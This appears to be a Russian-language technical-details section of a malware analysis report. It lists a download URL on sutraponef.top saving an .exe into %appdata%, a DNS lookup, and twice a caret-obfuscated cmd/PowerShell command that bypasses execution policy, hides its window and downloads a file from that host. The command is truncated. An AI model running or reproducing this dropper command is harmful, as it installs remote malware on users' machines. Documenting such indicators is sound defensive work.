Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pow^ers^HEl^L.eX^e^ ^-EXE^C^UT^IOnPol^I^c^y ^BypA^Ss -n^OPR^OFIL^e^ ^-^Wi^nDoWsTYle^ hI^ddE^N^ (neW-O^BJe^cT sYs^Te^m.^N^Et.Webc^l^IenT).^doWNlOadf^iL^e^('http://sutrapo...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "pow^ers^HEl^L.eX^e^ ^-EXE^C^UT^IOnPol^I^c^y ^BypA^Ss -n^OPR^OFIL^e^ ^-^Wi^nDoWsTYle^ hI^ddE^N^ (neW-O^BJe^cT sYs^Te^m.^N^Et.Webc^l^IenT).^doWNlOadf^iL^e^('http://sutrapo...' (со скрытым окном)